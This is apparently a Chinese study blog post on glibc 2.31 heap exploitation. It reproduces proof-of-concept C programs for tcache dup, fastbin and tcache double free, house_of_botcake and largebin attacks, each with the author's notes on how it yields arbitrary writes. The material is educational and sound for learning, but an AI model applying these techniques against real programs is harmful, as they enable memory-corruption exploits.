学习的一下高版本的libc的利用方式。

  项目地址:https://github.com/StarCross-Tech/heap_exploit_2.31

tcache_dup

源代码:

 1 #include<stdio.h>

 2 #include<stdlib.h>

 3 #include<inttypes.h>

 4 int main(int argc,char **argv)

 5 {

 6     //this is tcache

 7     /*

 8     *typedef struct tcache_entry

 9     {

10         struct tcache_entry *next;

11    //This field exists to detect double frees.

12         struct tcache_perthread_struct *key;

13     } tcache_entry;

14      */

15     setbuf(stdout, 0);

16     setbuf(stderr, 0);

17     printf("tcache_dup can help you achieve \"arbitrary address writes\"\n");

18     void *p,*q,*r,*d;

19     p = malloc(0x10);

20     q = malloc(0x10);

21     free(p);

22     printf("now , we have a tcache which is already free\n");

23     printf("We can modify its next pointer!\n");

24     *(uint64_t *)p = (uint64_t)q;

25     printf("now p's next pointer = q\n");

26     printf("p's next = %p ,q = %p\n",*(uint64_t *)p,q);

27     printf("so,We can malloc twice to get a pointer to q,sure you can change this to what you want!\n");

28     r = malloc(0x10);

29     d = malloc(0x10);

30     printf("OK!, we get we want!\n");

31 }

  u1s1,我看完之后没有任何收获。

fastbin_double_free

源代码:

 1 #include<stdio.h>

 2 #include<stdlib.h>

 3 #include<inttypes.h>

 4 int main()

 5 {

 6     /*this is double free related security mechanisms in glibc 2.29.

 7      *    if (__builtin_expect (old == p, 0))

 8       malloc_printerr ("double free or corruption (fasttop)");

 9     * */

10     setbuf(stdout, 0);

11     setbuf(stderr, 0);

12     printf("fastbin_double_free can help you achieve \"arbitrary address writes\"\n");

13

14     void *q,*r,*d;

15     void *p[7];

16     printf("First of all ,we need to Apply for heap blocks of the same size to consume tcache!\n");

17     for(int i=0;i<7;i++)

18     {

19         p[i] = malloc(0x10);

20         printf("p[%d]  ===>  %p\n",i,p[i]);

21     }

22     q = malloc(0x10);

23     r = malloc(0x10);

24     printf("now , we need to free 7 heap blocks to populate tcache linked list!\n");

25     for(int i=0;i<7;i++)

26     {

27         printf("now free p[%d]  ===>  %p\n",i,p[i]);

28         free(p[i]);

29         p[i] = 0;

30     }

31     printf("now ,Our free heap blocks will be put into fastbin\n");

32     printf("now free q  ===>  %p\n",q);

33     free(q);

34     printf("in order to achieve double free , we need to free another block to bypass check in glibc 2.29 !\n");

35     printf("now free r  ===>  %p\n",r);

36     free(r);

37     printf("now we free q again!\n");

38     printf("now free q  ===>  %p\n",q);

39     free(q);

40     printf("OK,we already achieve double free in glibc 2.29.!\n");

41 }

  利用思路是,先free掉7个chunk来填充tcache,然后就和2.23的double free一样,free(a),free(b),free(a)来达到任意地址写。

tcache_double_free

源代码:

 1 #include<stdio.h>

 2 #include<stdlib.h>

 3 #include<inttypes.h>

 4 int main(int argc,char **argv)

 5 {

 6     //glibc 2.29 Security Mechanism

 7     /*

 8      *if (__glibc_unlikely (e->key == tcache))

 9       {

10         tcache_entry *tmp;

11         LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);

12         for (tmp = tcache->entries[tc_idx];

13          tmp;

14          tmp = tmp->next)

15           if (tmp == e)

16         malloc_printerr ("free(): double free detected in tcache 2");

17         // If we get here, it was a coincidence.  We've wasted a

18            few cycles, but don't abort.

19       }

20      */

21     setbuf(stdout, 0);

22     setbuf(stderr, 0);

23     printf("tcache_double_free can help you achieve \"arbitrary address writes\"\n");

24     void *p,*q,*r,*d;

25     p = malloc(0x10);

26     free(p);

27     printf("now we already free p = %p\n",p);

28     printf("we can change its key to help us achieve double free\n");

29     printf("its key = %p,now\n",*(uint64_t *)(p+8));

30     *(uint64_t *)(p + 8) = 0x122220;

31     printf("after we change,its key = %p\n",*(uint64_t *)(p+8));

32     printf("so we can achieve double free!");

33     free(p);

34     printf("now we already achieve double free in glibc 2.29");

35     return 0;

36 }

  在2.29及以上,chunk被free后存在tache时,为了检测是否被double free引入一个key值。再具体的东西我也不懂(菜狗不想看glibc源码)。

  这个例子的利用思路就是,free(a),然后修改a这个chunk的key值,然后就可以继续free(a)了,然后就可以实现任意写了。

house_of_botcake

源代码:

 1 #include <stdio.h>

 2 #include <stdlib.h>

 3 #include <inttypes.h>

 4

 5 static uint64_t victim = 0;

 6 int main()

 7 {

 8     setbuf(stdin, NULL);

 9     setbuf(stdout, NULL);

10

11     printf("Inspired by how2heap\n");

12     printf("You can use this technique to create chunk overlap, only relies on double free.\n");

13

14     printf("\n1. Alloc 7 chunks to fill up tcache list\n");

15

16     char *x[7];

17     for(int i=0; i<7; i++){

18         x[i] = malloc(0x100);

19     }

20

21     printf("\n2. Prepare two chunk with the same size as befor, for consolidation in unsortedbin\n");

22

23     char *a = malloc(0x100);

24     char *b = malloc(0x100);

25

26     printf("Padding chunk to prevent consolidation\n");

27     malloc(0x10);

28

29     printf("\n3. Fill in the tcache list and consolidation two prepared chunk in unsortedbin\n");

30     for(int i=0; i<7; i++){

31         free(x[i]);

32     }

33

34     free(b);

35     free(a);

36

37     printf("\n4. Get a chunk from tcache list and make chunk overlap\n");

38     malloc(0x100);

39

40     free(b);

41     printf("Now, chunk %p will be freed into tcache list\n", b);

42

43     char* res = malloc(0x130);

44     printf("Size is not matched with tcache list, so get chunk from unsortedbin, which makes chunk overlap\n");

45

46     *(uint64_t*)(res+0x110) = (uint64_t)(&victim);

47

48     printf("Now, you can control tcache list to alloc arbitrary address\n");

49     malloc(0x100);

50

51     char *target = malloc(0x100);

52     printf("Before attack, victim's value: 0x%lx\n", victim);

53     *(uint64_t*)target = 0xdeadbeef;

54     printf("After attack, victim's value: 0x%lx\n", victim);

55

56     return 0;

57 }

  利用double free构造堆块重叠。

  首先将tcache填充满,然后free两个同样大小的堆块a和b,让a和b合并。将tcache中的一个chunk申请出来,然后再次free掉b堆块,此时b堆块既在unsortedbin中,又在tcache链中。

  修改b堆块的fd指针为victim_addr,申请两次chunk,第二次就申请到victim_addr了。

largebin_attack

源代码:

 1 #include <stdio.h>

 2 #include <stdlib.h>

 3 #include <inttypes.h>

 4

 5 static uint64_t victim;

 6

 7 int main()

 8 {

 9     setbuf(stdout, 0);

10     setbuf(stderr, 0);

11

12     printf("You can use this technique to write a big number to arbitrary address\n");

13     char *p1, *p2, *p3;

14     printf("\n1. Create two chunk, and free the larger one into largebin list\n");

15

16     p1 = malloc(0x458);

17     malloc(0x18);

18     p2 = malloc(0x448);

19     malloc(0x18);

20

21     free(p1);

22     //trigger

23     malloc(0x600);

24

25     printf("Now the chunk %p is in largebin\n", p1);

26

27     printf("\n2. Free the smaller one into unsortedbin, and change chunk's bk_nextsize in largebin to &victim-0x20\n");

28     free(p2);

29     printf("Now the chunk %p is in unsortedbin\n", p2);

30

31     *(uint64_t*)(p1+0x18) = (uint64_t)(&victim)-0x20;

32

33     printf("\n3. Alloc a size not match the the chunk size in unsortedbin\n");

34     printf("It will trigger largebin attack, write a big number to victim\n");

35     printf("Before attack, victim's value: 0x%lx\n", victim);

36     malloc(0x68);

37     printf("After attack, victim's value: 0x%lx\n", victim);

38

39     return 0;

40 }

  创建两个大于0x400的chunk(a)和chunk(b),先将chunk(a)释放掉,让chunk(a)先落入unsortedbin中,再创建size比这个chunk(a)大的堆块,此时的chunk(a)就会进入largebins。

  将chunk(b)释放掉,将chunk(a)的bk_nextsize修改为victim-0x20,此时chunk(b)在unsortedbin中,申请一个比chunk(b)小的chunk,就会触发largebin attack,在victim处留下一个较大的数。

heap exploit about ptmalloc in glibc version 2.31的更多相关文章

  1. OD: Heap Exploit : DWORD Shooting & Opcode Injecting

    堆块分配时的任意地址写入攻击原理 堆管理系统的三类操作:分配.释放.合并,归根到底都是对堆块链表的修改.如果能伪造链表结点的指针,那么在链表装卸的过程中就有可能获得读写内存的机会.堆溢出利用的精髓就是 ...

  2. linux系统编程:获取glibc的版本号

    我的环境是ubuntu16.04 glibc官网:http://www.gnu.org/software/libc/libc.html 方法一.一般来说,涉及到库调用的程序,在链接时候都会链接到gli ...

  3. 检测Linux glibc幽灵漏洞和修补漏洞

    1.首先安装rpm : sudo apt-get install rpm   wget -OGHOST-test.sh http://www.antian365.com/lab/linux0day/G ...

  4. Linux Glibc幽灵漏洞紧急修补方案【转】

    转自:http://blog.csdn.net/chen19870707/article/details/43560823 幽灵漏洞是Linux glibc库上出现的一个严重的安全问题,他可以让攻击者 ...

  5. tcmalloc jemalloc 和ptmalloc 对比

    ptmalloc 是glibc的内存分配管理 tcmalloc 是google的内存分配管理模块 jemalloc 是BSD的提供的内存分配管理 三者的性能对比参考从网上的一个图如下: 自己测试了一下 ...

  6. 极客时间-左耳听风-程序员攻略-Linux系统、内存和网络

    程序员练级攻略:Linux系统.内存和网络 Linux 系统相关 Red Hat Enterprise Linux 文档 . Linux Insides ,GitHub 上的一个开源电子书,其中讲述了 ...

  7. 安装 jemalloc for mysql

    参考: MySQL bug:https://bugs.mysql.com/bug.php?id=83047&tdsourcetag=s_pcqq_aiomsg https://github.c ...

  8. 2.Linux文件IO编程

    2.1Linux文件IO概述 2.1.0POSIX规范 POSIX:(Portable Operating System Interface)可移植操作系统接口规范. 由IEEE制定,是为了提高UNI ...

  9. gdb常用命令(转)

    pwn常常会用到gdb,看到一篇不错的文章,记录了很多命令:https://www.jianshu.com/p/c3e5f5972b21 gdb 基础调试命令 s step,si步入 n 执行下一条指 ...

随机推荐

  1. [bzoj4650]优秀的拆分

    由于字符串是AABB的形式,枚举AA和BB中间的位置,分别考虑AA和BB的数量,乘起来sigma一下即为答案以下考虑AA的情况(BB同理),枚举A的长度,然后按照这个长度分为若干块,那么每一个A一定可 ...

  2. TCP、三次握手、四次挥手(图解)

    传输控制协议(TCP,Transmission Control Protocol)是一种面向连接的.可靠的.基于字节流的传输层通信协议,为了在不可靠的互联网络上提供可靠的端到端字节流而专门设计的一个传 ...

  3. 从零开始学Kotlin第五课

    函数式编程入门: package EL fun main(args: Array<String>) { var names= listOf<String>("tom& ...

  4. HTML四种定位-固定定位

    固定定位 1 <!DOCTYPE html> 2 <html lang="en"> 3 <head> 4 <meta charset=&q ...

  5. Mac更换鼠标指针样式_ANI、CUR文件解析

    前情提要 因为之前写了一篇mousecape的博客有一些回应,所以我决定写个续.主要是教大家怎么把cur文件和ani文件插入到mousecape里面,顺便提供几个做好的cape文件. 先给大家推荐一个 ...

  6. 决策单调性&wqs二分

    其实是一个还算 trivial 的知识点吧--早在 2019 年我就接触过了,然鹅当时由于没认真学并没有把自己学懂,故今复学之( 1. 决策单调性 引入:在求解 DP 问题的过程中我们常常遇到这样的问 ...

  7. Hermite WENO 重构格式

    Hermite WENO 单元重构 本文主要介绍采用 Hermite WENO 重构方法作为斜率限制器应用于二维或高维单元中. 1.简介[1] ENO格式最早由 Harten 等[2]提出,ENO格式 ...

  8. c6和c7

    Centos6.x普遍采用 ext3\ext4(Fourth EXtended filesystem)文件系统格式, EXT3 支持的最大 16TB 文件系统和最大 2TB 文件 Ext4 分别支持1 ...

  9. python-django-模板标签

    注意:这个控制语句和python的差不多,但是记住必须有endfor 和endif 结尾 模板文件的django格式的注释是不会出现再网页渲染的源代码当中的 使用列子: <!DOCTYPE ht ...

  10. (转载)java排序实现

    Java实现几种常见排序方法 日常操作中常见的排序方法有:冒泡排序.快速排序.选择排序.插入排序.希尔排序,甚至还有基数排序.鸡尾酒排序.桶排序.鸽巢排序.归并排序等. 冒泡排序是一种简单的排序算法. ...